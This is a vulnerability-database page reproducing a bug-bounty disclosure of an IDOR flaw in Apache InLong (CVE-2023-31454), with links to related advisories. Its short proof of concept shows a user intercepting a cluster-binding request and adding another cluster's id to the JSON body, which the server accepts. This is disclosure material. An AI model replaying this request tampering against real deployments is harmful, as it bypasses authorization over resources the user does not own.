Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrLujiefsiF36896B7-6DFA-409D-9C5B-E7AE92016750
HistoryApr 17, 2023 - 9:16 a.m.

IDOR make users can bind any cluster

2023-04-1709:16:05
lujiefsi
www.huntr.dev
6
idor
cluster binding
ownership verification

EPSS

0.002

Percentile

61.1%

JSON

Proof of Concept

1 admin create cluster1, cluster2, clusterTag1 and clusterTag2

2 admin add user1 as owner of cluster1,clusterTag1

3 user1 bind clusterTag1 to cluster1

4 user1 use burpsuite hiajck the request

5 the request content can be

{“clusterTag”:“biaoqia4”,“bindClusters”:[1]}

6 change the request content:

{“clusterTag”:“biaoqia4”,“bindClusters”:[1,2]}

  2 is the id of cluster2. user1 is not the owner of cluster2.

7 result:

{“success”:true,“errMsg”:null,“data”:true}

Related

github 1
cnvd 1
nvd 1
osv 2
cvelist 1
prion 1
cve 1
github
github
Apache InLong vulnerable to Incorrect Permission Assignment for Critical Resource
2023-07-06 21:14:59
cnvd
cnvd
Apache InLong Security Bypass Vulnerability (CNVD-2023-42959)
2023-05-28 00:00:00
nvd
nvd
CVE-2023-31454
2023-05-22 14:15:09
osv
osv
CVE-2023-31454
2023-05-22 14:15:09
Apache InLong vulnerable to Incorrect Permission Assignment for Critical Resource
2023-07-06 21:14:59
cvelist
cvelist
CVE-2023-31454 Apache InLong: IDOR make users can bind any cluster
2023-05-22 13:23:17
prion
prion
Design/Logic Flaw
2023-05-22 14:15:00
cve
cve
CVE-2023-31454
2023-05-22 14:15:09

EPSS

0.002

Percentile

61.1%

JSON
Related for F36896B7-6DFA-409D-9C5B-E7AE92016750
github1cnvd1nvd1osv2cvelist1prion1cve1